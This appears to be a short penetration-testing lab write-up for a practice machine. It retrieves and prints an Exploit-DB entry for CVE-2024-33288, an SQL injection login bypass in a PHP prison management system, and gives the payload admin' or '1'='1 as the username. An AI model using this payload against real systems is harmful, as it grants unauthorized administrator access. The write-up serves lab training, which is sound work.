CVE-2024-33288
The target Prison Management System instance appears to suffer from CVE-2024-33288
Prison Management System Using PHP suffers from a remote SQL injection vulnerability that allows for authentication bypass.
Exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ searchsploit -m php/webapps/52017.txt ; mv 52017.txt CVE-2024-33288.txt
Exploit: Prison Management System - SQL Injection Authentication Bypass
URL: https://www.exploit-db.com/exploits/52017
Path: /usr/share/exploitdb/exploits/php/webapps/52017.txt
Codes: N/A
Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/PEN-200/PG_PRACTICE/vmdak/52017.txt
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ cat CVE-2024-33288.txt
# Exploit : Prison Management System Using PHP -SQL Injection Authentication Bypass
# Date: 15/03/2024
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:https://www.sourcecodester.com/sql/17287/prison-management-system.html
# Tested on: Windows ,XAMPP
# CVE : CVE-2024-33288
# Proof of Concept:
Step 1-Visit http://localhost/prison/
Step 2 - Click on Admin Dashboard button and redirect on login page.
Step 3– Enter username as admin' or '1'='1 and password as 123456
Step 4 – Click sing In and now you will be logged in as admin.
PoC
It works
However, I was already able to get to the admin page using the default credential